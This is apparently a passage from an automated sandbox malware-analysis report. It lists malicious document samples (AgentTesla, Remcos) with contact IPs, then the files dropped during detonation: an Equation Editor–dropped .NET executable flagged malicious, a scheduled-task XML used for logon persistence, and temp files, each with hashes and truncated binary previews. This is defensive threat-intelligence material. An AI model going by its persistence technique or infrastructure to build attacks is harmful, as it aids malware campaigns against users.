                                                        R1iBOIfySQ.xlsxGet hashmaliciousHidden Macro 4.0Browse
                                                        • 172.67.175.222
                                                        msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.175.222
                                                        L2165c5ZiO.rtfGet hashmaliciousRemcosBrowse
                                                        • 172.67.175.222
                                                        Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                                                        • 172.67.175.222
                                                        mrOdyevwvZ.rtfGet hashmaliciousUnknownBrowse
                                                        • 172.67.175.222
                                                        OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                                                        • 172.67.175.222
                                                        P.O.109961.xlsGet hashmaliciousRemcosBrowse
                                                        • 172.67.175.222
                                                        MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.175.222
                                                        36f7277af969a6947a61ae0b815907a1msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        NEW GRACE- RFQ .docGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        78YW3Fcvv0.rtfGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        Booking copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        Dados Da Reserva.ppamGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        Request_For_ Quotation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        RFQ.docGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        302814Q.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205
                                                        New Order 3118.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        • 104.26.13.205

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr

                                                        Download File
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C71D985-EA41-483D-AC7B-8DDE867F36C9}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A0CF2FEA-DB32-4D1A-9AB9-76AD3750DB0A}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):221696
                                                        Entropy (8bit):3.4833944956086045
                                                        Encrypted:false
                                                        SSDEEP:6144:tdecyemMdecyemMdecyemMdecyemMdecyemLLVoEY:AVk
                                                        MD5:947E29D76E4801BC8F8ABFCD8D93DDE2
                                                        SHA1:0AA04CEB81186E08CC71B93E9EF21F4D1DE62329
                                                        SHA-256:04A99B9CED45DEAD8BCCE099FF95009F01B5E58B3DB733A483E28CC6C9472390
                                                        SHA-512:FAD86A1CB25BB1B49E467B90DFA29C6C3E9896CD269BE7060D5F00A217206F5DBF7ECC407E4088B015643530CF5B1603652F3255B53727A9323B2D6438064C35
                                                        Malicious:false
                                                        Preview:8.3.2.6.8.2.5.6.D.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .e.a.r.l.i.e.r. .v.e.r.s.i.o.n. .m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e. .w.o.r.d...T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .(.".E.n.a.b.l.e. .e.d.i.t.i.n.g.".). .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e.A.S.S.I.G.N.M.E.N.T.M.C.S. .4.7.3.:. .M.A.R.K.E.T.I.N.G. .M.A.N.A.G.E.M.E.N.T. .&. .S.T.R.A.T.E.G.Y.S.T.U.D.E.N.T. .N.A.M.E.:. .F.r.a.n.k. .H.u.t.t.o.n.S.T.U.D.E.N.T. .N.o.:. .2.0.7.2.4.4.1.4.I.N.D.E.X. .N.o.:. .5.0.5.6.1.2.0.C.E.N.T.R.E.:. .G.R.E.E.N.F.I.E.L.D.S.1... .i... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .r.e.f.e.r.s. .t.o. .a. .s.u.r.p.r.i.s.i.n.g. .a.d.v.e.r.t.i.s.i.n.g. .s.t.r.a.t.e.g.y. .a.n.d. .w.i.t.h. .u.n.c.o.n.v.e.n.t.i.o.n.a.l. .i.n.t.e.r.a.c.t.i.o.n.s. .t.o. .p.r.o.m.o.t.e. .t.h.e. .p.r.o.d.u.c.t.s. .a.n.d. .s.e.r.v.i.c.e.s... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .i.s. .p.u.b.l.i.c.i.t.y. .p.r.a.c.t.i.c.e.s.,. .l.o.w.-.c.o.s.t. .

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CA7CEBAD-42A1-4273-8FE9-A682D89DB5DF}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1536
                                                        Entropy (8bit):1.3586208805849456
                                                        Encrypted:false
                                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbc:IiiiiiiiiifdLloZQc8++lsJe1MzX/
                                                        MD5:B476E311559A9E5A2C88C853AAC17A45
                                                        SHA1:A69669A8B96A2A94BAE5BEBB01085EA30686ED6E
                                                        SHA-256:F567379D184F0A8428D037F3663CCCE9BE0482C525CDA5462C953034648D3FF8
                                                        SHA-512:8875EDC32415713145FEF8C471059CBC5E2D84D618F534F5EDD74E211D973805DAE975F9532ABD2D5C6A89CE75D17BFCF0F3E70C83B4FB8B756DC493768EEC5C
                                                        Malicious:false
                                                        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F50586BA-2E23-4FD0-A214-B66A4504F162}.tmp

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1024
                                                        Entropy (8bit):0.05390218305374581
                                                        Encrypted:false
                                                        SSDEEP:3:ol3lYdn:4Wn
                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                        Malicious:false
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\5nap3g1o.oc0.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\e4ub2uzd.xhj.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\es4ckite.zr3.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\g5up0ku4.bo3.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\ghsed41m.5d1.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\hf3jclet.333.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\kzemplcs.rey.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\qsvifntv.1ns.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\tmp786B.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.129216868473911
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                        MD5:6689D2BA65A88C42A4BCA6DB45EFB43A
                                                        SHA1:4DD0917F5FBC434735AD93F5422D936A8AE13F6C
                                                        SHA-256:326AE29321B4350D0CA715724280CA837917D5D417BC365E5F1F70918D5682FA
                                                        SHA-512:0A80F167A6EB2C7CB3F555D4E4A50ED4150B91E05D324925CF8A324BCA0BFEAAEC964BD6786DD926F7715CAF445BA23459E1AD857EB8D4B1F3FDAE17FCB193EA
                                                        Malicious:true
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                        C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.129216868473911
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                        MD5:6689D2BA65A88C42A4BCA6DB45EFB43A
                                                        SHA1:4DD0917F5FBC434735AD93F5422D936A8AE13F6C
                                                        SHA-256:326AE29321B4350D0CA715724280CA837917D5D417BC365E5F1F70918D5682FA
                                                        SHA-512:0A80F167A6EB2C7CB3F555D4E4A50ED4150B91E05D324925CF8A324BCA0BFEAAEC964BD6786DD926F7715CAF445BA23459E1AD857EB8D4B1F3FDAE17FCB193EA
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scan 368 1.LNK

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:02 2023, mtime=Fri Aug 11 15:42:02 2023, atime=Thu Apr 18 07:37:21 2024, length=327186, window=hide
                                                        Category:dropped
                                                        Size (bytes):1014
                                                        Entropy (8bit):4.523728842953765
                                                        Encrypted:false
                                                        SSDEEP:12:8rzFgXg/XAlCPCHaXtBYB/J89rX+WncJlNhuicvbs4Tx+DtZ3YilMMEpxRljKTTE:8r//XT9Oc9klNegOx+Dv3qKk7N
                                                        MD5:1B41F0B84094E3B1629AE6E9C7A97CDF
                                                        SHA1:904A0D8C32430CA1BE449EB3D8C263C39E3C4950
                                                        SHA-256:F33018199479262195979F5E645E9EE2AE1897A1CCF3F635C1B99875CAF9FBC6
                                                        SHA-512:8A7F5053BF41D3AB0C221C3612BDB42BAECB56CFC27D52735D71CB81210B046191029EB69F5E64AED125E4C42B87B9B3D266A7CE35D0D4738BBE77820502CEC8
                                                        Malicious:false
                                                        Preview:L..................F.... .....o.r.....o.r......k................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.D..user.8......QK.X.X.D*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......X.D .SCAN36~1.DOC..J.......WB..WB.*.........................S.c.a.n. .3.6.8. .1...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Scan 368 1.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n. .3.6.8. .1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Generic INItialization configuration [folders]
                                                        Category:dropped
                                                        Size (bytes):54
                                                        Entropy (8bit):4.592759955827109
                                                        Encrypted:false
                                                        SSDEEP:3:M1hELOFMCm4JiOFMCv:MULOFMpOFMs
                                                        MD5:0285441C82778E35E75EDEF39B63C94D
                                                        SHA1:AB09184C1A91AC9BE48658FB9CEEB14A3C0C0B5D
                                                        SHA-256:F2F22FC8E4A961FF3E6D9910E5637850C656A85DB049D039C6ED04F659AE3332
                                                        SHA-512:896B3DA404DB1F7DEDA6412D25441E63021F5ED98C37E005E436AB46DA565C7679BC0AD5DFE2D47204FC80FE5E02E431D9C7388CB5A089E44095514D907B56C1
                                                        Malicious:false
                                                        Preview:[doc]..Scan 368 1.LNK=0..[folders]..Scan 368 1.LNK=0..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020307
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                        C:\Users\user\AppData\Roaming\obimohohj75.scr

                                                        Download File
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D f.................@..."......._... ........@.. ....................................@..................................^..W....`... ...........d...6........................................................... ............... ..H............text....?... ...@.................. ..`.rsrc.... ...`... ...B..............@..@.reloc...............b..............@..B.................^......H.......,....O......C....................................................0..A....... F........%.....(......... .........%./...(.....0...(....*.....&*...f.(.....s....}......}....*...0..........~0.....~.......o....~....%-.&~..........s....%.....(...+o.....+......E........d...3...d...j...............+.8.....o.....s......o.....o....&.. ..... ....Y..+...o........(....o......o...... ..... 01..Y..8u...s.......o.....o......+.+......E............9...h.......Z...................+...+..

                                                        C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\obimohohj75.scr
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):694792
                                                        Entropy (8bit):7.9653372839221515
                                                        Encrypted:false
                                                        SSDEEP:12288:/n1A7USCVbumqsPi4wousYMHrLEmhH9WNwClKmkDaW4JOQAmnkIlRz15C+ZkR:f1A7UPbumFjwo9nNBxC8GdymkIt5Q
                                                        MD5:A1B496997BE52302CB008BB93FABCFBF
                                                        SHA1:1A6E056273C58790868D73B61359A652B3D7B4A0
                                                        SHA-256:A79ED53396570071A97528394A3A3B33A95EFA65823E42CF2B17AECA682336AB
                                                        SHA-512:4504C2B962069AABC8B33FA3DF57D1663C88E1BC8AB5FAA7B7D1D1EB22FCEF89E263FBB936A0B1DDDFBA59E82763A8FD919AB718B05A308688613E2018882ED5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                        • Antivirus: Virustotal, Detection: 47%, Browse
